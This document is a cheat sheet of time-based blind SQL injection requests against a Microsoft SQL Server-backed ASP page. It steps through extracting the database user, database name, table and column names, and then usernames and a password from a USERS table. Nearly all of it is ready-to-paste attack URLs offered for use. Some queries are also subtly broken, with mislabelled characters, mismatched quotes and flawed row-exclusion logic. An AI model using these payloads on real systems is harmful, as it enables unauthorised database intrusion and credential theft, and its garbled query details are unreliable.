Microsoft SQL Blind Exploit

BLIND SQL INJECTION – DETECTION

Notation used throughout: "(+10 seconds)" after a request marks a response that came back delayed, i.e. the injected condition evaluated true; requests listed without it returned without delay.

Integer Injection:
http://[site]/page.asp?id=1; WAITFOR DELAY ’00:00:10‘– (+10 seconds)

String Injection:
http://[site]/page.asp?id=x’; WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
 

BLIND SQL INJECTION – EXTRACT DATABASE USER
3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)


D – 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY ‘00:00:10‘– 

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY ‘00:00:10‘– 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY ‘00:00:10‘– 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
Database User = DBO

 

BLIND SQL INJECTION – EXTRACT DATABASE NAME
 
http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
Database Name = PRO-DB-1

 

BLIND SQL INJECTION – EXTRACT 1st DATABASE TABLE

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=’U’)=5) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Table Name = USERS

 

BLIND SQL INJECTION – EXTRACT 2nd DATABASE TABLE
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘)=6) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),1,1)))=111) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),2,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),3,1)))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),4,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),5,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),6,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Table Name = ORDERS

 

BLIND SQL INJECTION – EXTRACT 3rd DATABASE TABLE
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘)=9) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),1,1)))=99) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),2,1)))=117) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),3,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),4,1)))=116) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),5,1)))=111) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),6,1)))=109) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),7,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),8,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),9,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Table Name = CUSTOMERS

 

BLIND SQL INJECTION – EXTRACT 1st TABLE COLUMN NAME
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘)=4) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS),1,1)))=117) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS),2,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS),3,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS),4,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Column Name = USER

 

BLIND SQL INJECTION – EXTRACT 2nd TABLE COLUMN NAME
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>USER‘)=4) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>USER),1,1)))=112) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>USER),2,1)))=97) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>USER),3,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>’USER),4,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Column Name = PASS

 

BLIND SQL INJECTION – EXTRACT 3rd TABLE COLUMN NAME
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>,PASS)=2) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>PASS),1,1)))=105) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>PASS),2,1)))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Column Name = ID

 

BLIND SQL INJECTION – EXTRACT 1st FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Field Data = ADMIN

 

BLIND SQL INJECTION – EXTRACT 2nd FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Field Data = 123

 

BLIND SQL INJECTION – EXTRACT 3rd FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID  from USERS)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),1,1))=49) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),2,1))=48) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),3,1))=48) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Field Data = 100

 

BLIND SQL INJECTION – EXTRACT 1st FIELD OF 2nd ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USERS desc)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),1,1)))=106) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),2,1)))=111) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),3,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Field Data = JOE

 

BLIND SQL INJECTION – EXTRACT 1st FIELD OF 3rd ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USERS desc)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),1,1)))=106) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),2,1)))=105) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),3,1)))=109) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
Field Data = JIM